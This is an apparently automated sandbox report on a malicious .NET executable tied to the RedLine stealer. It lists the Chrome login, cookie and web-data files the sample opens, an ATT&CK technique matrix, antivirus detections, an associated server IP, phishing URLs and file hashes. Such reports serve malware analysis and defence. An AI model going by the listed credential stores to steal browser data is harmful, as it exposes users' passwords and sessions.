Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040202A cpuid 3_2_0040202A
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data (opened via the direct path and via 1 to 10 nested Application Data\ components under AppData\Local)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data (opened via the direct path and via 1 to 11 nested Application Data\ components under AppData\Local)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (opened via 1 to 11 nested Application Data\ components under AppData\Local; no direct-path open was recorded)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies (opened via the direct path and via 1 to 10 nested Application Data\ components under AppData\Local)
Note: C:\Users\user\AppData\Local\Application Data is a compatibility junction that points back to AppData\Local, so every nested variant above resolves to the same four Chrome files; the repeated path components are what a recursive directory walk that follows that junction produces.
MITRE ATT&CK Matrix (the number in parentheses is the count the report shows beside that technique; techniques without a number were not observed for this sample)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Native API (1); Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: Process Injection (11); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (121); Process Injection (11); Obfuscated Files or Information (1); Software Packing (12); Timestomp (1)
Credential Access: OS Credential Dumping (1); Input Capture (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery (121); Virtualization/Sandbox Evasion (121); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (23); System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Screen Capture (1); Input Capture (1); Archive Collected Data (1); Data from Local System (1); Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: Encrypted Channel (2); Non-Standard Port (1); Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
Antivirus detection (Source / Detection / Scanner / Label)
file.exe / 38% / ReversingLabs / ByteCode-MSIL.Trojan.Heracles
file.exe / 43% / Virustotal
file.exe / 100% / Joe Sandbox ML
No Antivirus matches
No contacted domains info
                      high
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchfile.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://www.jiyu-kobo.co.jp/jp/file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://en.wikipfile.exe, 00000000.00000003.540784331.000000000597E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.jiyu-kobo.co.jp/?file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=file.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://www.jiyu-kobo.co.jp/Suefile.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.carterandcone.comlfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.founder.com.cn/cn/file.exe, 00000000.00000003.541188088.000000000597C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://ac.ecosia.org/autocomplete?q=file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://search.yahoo.com?fr=crmas_sfpfile.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers/cabarga.htmlNfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cnfile.exe, 00000000.00000003.541122156.000000000597C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541188088.000000000597C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers/frere-user.htmlfile.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.fontbureau.comoitufile.exe, 00000000.00000003.555478821.0000000005970000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.550366748.0000000005973000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.561708269.0000000005978000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/jp/&file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/rfile.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/Y0-ffile.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.comofile.exe, 00000000.00000003.555478821.0000000005970000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.550366748.0000000005973000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/lfile.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers8file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.carterandcone.comsiofile.exe, 00000000.00000003.541494170.0000000005973000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://www.jiyu-kobo.co.jp/WebdAfile.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
89.238.170.240 | unknown | United Kingdom | 9009 | M247GB | false
                                          Joe Sandbox Version:37.1.0 Beryl
                                          Analysis ID:895395
                                          Start date and time:2023-06-28 01:58:05 +02:00
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 8m 54s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:4
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample file name:file.exe
                                          Detection:MAL
                                          Classification:mal72.spyw.evad.winEXE@3/1@0/1
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HDC Information:
                                          • Successful, ratio: 91.9% (good quality ratio 90.4%)
                                          • Quality average: 91.5%
                                          • Quality standard deviation: 18.6%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 38
                                          • Number of non-executed functions: 11
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Override analysis time to 240s for sample files taking high CPU consumption
                                          • Exclude process from analysis (whitelisted): audiodg.exe, WMIADAP.exe
                                          • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenFile calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
Time | Type | Description
01:59:05 | API Interceptor | 1x Sleep call for process: file.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
89.238.170.240 | file.exe | malicious | RedLine
89.238.170.240 | file.exe | malicious | RedLine
89.238.170.240 | file.exe | malicious | DarkTortilla
                                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
M247GB | eft02766324.htm | malicious | HTMLPhisher | 172.86.68.78
M247GB | https://e.targito.com/c?a=a765e20b-92d0-4544-a4c3-c23518cbf01d&o=gsklub_cz&m=6b67e0df-8f21-4d26-bac6-98abbf8b9329&c=75283f30-ec7c-4c64-8e96-b11b9ceb9007&d=1550125868&l=footer_menu_2&u=http://jtq.hummingbird-hemp.sa.com/jumeirah/YWJyYWhhbS5jaGFja29AanVtZWlyYWguY29t | malicious | HTMLPhisher | 172.111.230.78
M247GB | ORDER_PDF.scr.exe | malicious | AveMaria | 91.207.102.163
M247GB | file.exe | malicious | RedLine | 89.238.170.240
M247GB | file.exe | malicious | RedLine | 89.238.170.240
M247GB | ym9Q7TKfdl.elf | malicious | Mirai | 5.253.204.82
M247GB | https://view.monday.com/4691743240-93f0d1387675ad51e7ad30e1d370f7c2?r=use1 | malicious | HTMLPhisher | 193.29.104.34
M247GB | https://view.monday.com/1215796002-fa49e32916f403117361f25068bb796b?r=euc1 | malicious | HTMLPhisher | 38.132.122.142
M247GB | _Outlook_Sec.msi | malicious | Unknown | 37.120.222.88
M247GB | LkrzzStoiD.elf | malicious | Mirai | 196.16.207.202
M247GB | T4148lxE0N.exe | malicious | AveMaria, PrivateLoader, UACMe | 45.61.128.246
M247GB | https://www.dropbox.com/scl/fi/m9a263bb5nbicr9ldfrga/Please-the-vital-document-below.paper?dl=0&rlkey=wdjfbq8jvet7ijur79vtm40o5 | malicious | HTMLPhisher | 38.132.122.142
M247GB | OriginalMessage.txt.msg | malicious | HTMLPhisher | 185.156.172.41
M247GB | https://tracking.solutiondynamics.com/?ApplicationId=SASES;cid=WRC&eid=65836714&jid=71771&event=clicked&ref=UpdateDetails&ref2=21258/434/00D&dest=http://SVHUo.womansgiftshop.sa.com/neil.simpson@walbrookasset.com | malicious | Unknown | 172.111.230.78
M247GB | https://tracking.solutiondynamics.com/?ApplicationId=SASES;cid=WRC&eid=65836714&jid=71771&event=clicked&ref=UpdateDetails&ref2=83639/434/00D&dest=http://rGGZn.womansgiftshop.sa.com/j.ruiztarre@eif.org | malicious | Unknown | 172.111.230.78
M247GB | SII_Sec.msi | malicious | Unknown | 37.120.222.88
M247GB | Hceea.exe | malicious | Unknown | 93.177.75.77
M247GB | HUAHE_Updated_CATALOGUE_PDF.com.exe | malicious | AveMaria, GuLoader, PrivateLoader, UACMe | 37.120.210.219
M247GB | ORDER_PDF.scr.exe | malicious | AveMaria | 91.207.102.163
M247GB | PIvOX24YIO.elf | malicious | Mirai | 38.202.250.24
                                                No context
                                                No context
                                                Process:C:\Users\user\Desktop\file.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1216
                                                Entropy (8bit):5.355304211458859
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.471508522555688
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:file.exe
                                                File size:535'040 bytes
                                                MD5:ccbba2aac1cae3a0bd29cb42203e20b4
                                                SHA1:fc43185094768f22e4857f09cf902e4ab8b1ce57
                                                SHA256:3cd8941da73295f75980a8c38d92902b378614aabddfb395121cbc1724abce22
                                                SHA512:ecd37df1d15a76a90354021a28194d44948133de5e712a09666fdf85bc175e611dca27a660833fc7f865a1eaa942b703a1e25d3a0b2d8a9f75f86b7e6b5e3a56
                                                SSDEEP:6144:lRdos3JPCNdsRxUxQ/tYqKFBXf1iJi3m916neS8mJOWzTKHUGetd/3U2m24:Nos5m68QlYqKdyisScKWNckzh
                                                TLSH:FBB4473C1CBD2A3BC035D6B98FD5C463F554843F3922A936A8D787A44746EA225C323E
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............>=... ...@....@.. ....................................@................................
                                                Icon Hash:90cececece8e8eb0
                                                Entrypoint:0x483d3e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0xA1B089DF [Sat Dec 18 00:10:07 2055 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
